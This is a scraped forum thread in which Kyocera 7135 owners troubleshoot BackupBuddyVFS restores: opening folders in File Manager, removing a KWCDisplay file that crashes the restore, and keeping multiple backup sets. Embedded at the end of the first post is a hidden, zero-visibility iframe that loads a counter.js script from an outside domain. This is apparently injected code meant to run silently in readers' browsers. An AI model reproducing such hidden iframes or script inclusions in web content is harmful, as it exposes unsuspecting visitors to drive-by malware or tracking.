Had to do a hard reset. Luckily, I have BBVFS per you guy's suggestion. But I just can't figure out how to "launch" it from the card as the instructions say.
I'm going to file manager.
Choosing the card.
It shows two folders--Audio and Palm.]
I select" Palm" (although selecting "Audio" seems to take me to the "Palm" folders) and "go to home" from the dropdown menu (doubleclicking doesn't seem to work).
The Palm Folder has 3 folders inside: Backup, Launcher and Programs. Doubleclicking or "go to home" has no effect on any of them.
What am I doing wrong?
I have to also say that as of this moment I am officially SO frustrated with my 7135's instability that if I had known how bad it would be, I wouldn't have bought it. It makes my 6035 seem ven better than i use to think it was.
I just can't reccomend it to anyone who really NEEDS it--like I do. <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I have to do a reset and start over. And it's happened 10 times now. I've taken the card out, restarted the phone--I don't know.
I looked at the manual and it said to set the power on to at least 2-3 minutes and I did that.
Shoot. It's impossible to complain about free, but I had high hopes for this.
Some files can have conflicts when restored. For example, user "ep" and his modified KWCDisplay.PRC file. BackupBuddyVFS does not like to restore that one on my device at all.
Here's what you do in such a case ..... Watch the progress of the restore very closely. Usually it's slow enough to show you the name of the file that it's working on right before the crash. Usually the file that it's working on right before a crash is causing the problem. What you do in that case is hard reset the phone, go into the card with the built-in File Manager program, and delete or move that troublesome file out of the backup directory. Then try the restore again.

Interesting. It restores fine for me with BBVFS. Weird.
Problem is, when I try to go through filemanager, I can open the "Palm" directory on the SD card. But clicking on it shows 3 more directories--Backup, Launcher, and Programs. But I can't open any of them. They are highlighted but they don't open.

Navigating folders took me a few minutes to figure out. You have to click in the leftmost area where the folder is. That is how you go into it.

Yah, you have to click on the folder icon that is to the left of the name of the directory. You cannot click on the directory name itself, that won't work.
Dave was right. I then watched the restore carefully and noticed that it was kwc.display that was being loaded right before the crash. I deleted it and I restored without incident.
Perfect.
Makes sense, too, since my display looks...weird. Or at least different from how I set it up before the crash.
That file DOES control the screen display, right?
On another note, I am very grateful to this forum.
I sometimes wonder how much traffic such forums in general generate for companies. Particularly software companies! It must be huge. And the reduction in help queries and therefore the need for help STAFF must not be insignificant. Heck, even I occassionally have something useful to say on a forum!

What?! I thought this was true for everyone. Crashes during restore so exclude and re-install later... I do "select all" to create my backup list and KWCDisplay is the only one I have to scroll down to (a *long* way down) and uncheck. Sure would be convenient not to have to do that. On the other hand its been a *long* time since I've had a hard reset (intentional or otherwise) so I guess I should worry about it before restoring instead of before creating my backup list. -- never mind --
Originally posted by chrislrob Yep. kwc.display is what caused my restore crash. I liked it, but I don't like it that much!
Its not that bad... just a matter of "oops, I forgot to delete it from the backup before restoring". Of course if you are away from home you will have to do without all the neat display mods until you return to re-install it.
This is the alternative suggested by Blue Nomad via email:
"Hello,
Thanks for your message. Try installing the demo
version over the free
version..
You can then selectively restore files using the
advanced
restore screen... there may be a problem or
corrupt file..
You can get more information and download it
here...
Another trick to file away...
I use the Free version of BackupBuddy. You can make multple backup sets by copying the contents of the "Backup" folder on the SD card to another folder (like Backup03Sep03). If I come across a bad file that won't restore I have multiple restore points to chose from. Then I can rename the folders accordingly when I need to restore a particular backup set.
